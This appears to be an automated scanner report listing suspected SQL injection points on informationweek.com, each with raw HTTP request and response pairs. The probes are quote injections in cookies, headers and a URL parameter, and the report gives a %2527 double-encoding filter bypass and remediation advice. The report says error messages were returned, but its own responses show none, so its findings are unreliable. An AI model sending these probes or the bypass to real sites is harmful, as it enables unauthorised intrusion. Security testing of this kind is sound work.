The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Again the responses below are 200 OK (single quote) and 302 to the login gateway (two quotes), with no database error visible, so manual confirmation is needed.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character, which the web server decodes to %27 and the application's second decode turns into a quote after the filter has run.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ebNewBandWidth_.www.informationweek.com cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:16 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:16 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527%2527; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The captured responses are 200 OK and a 302 to the login gateway respectively; neither contains an error message, so treat this as unconfirmed.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The responses below follow the same 200 OK then 302-to-login pattern as the other cookies, with no database error shown.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:57 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:57 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. This is the plain single-quote variant of the earlier s_lv finding, against a different whitepaper URL; the evidence is again 200 OK followed by a 302 to the login gateway, with no error message in either response.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The responses below are 200 OK and a 302 to the login gateway; no database error is visible, so confirm manually.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character (decoded once by the web server to %27, and again by the application to a quote after the filter has run).
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_lv_s cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527%2527;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:21 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:21 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30461

<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:11 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:11 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:06 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:06 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:08 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:08 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
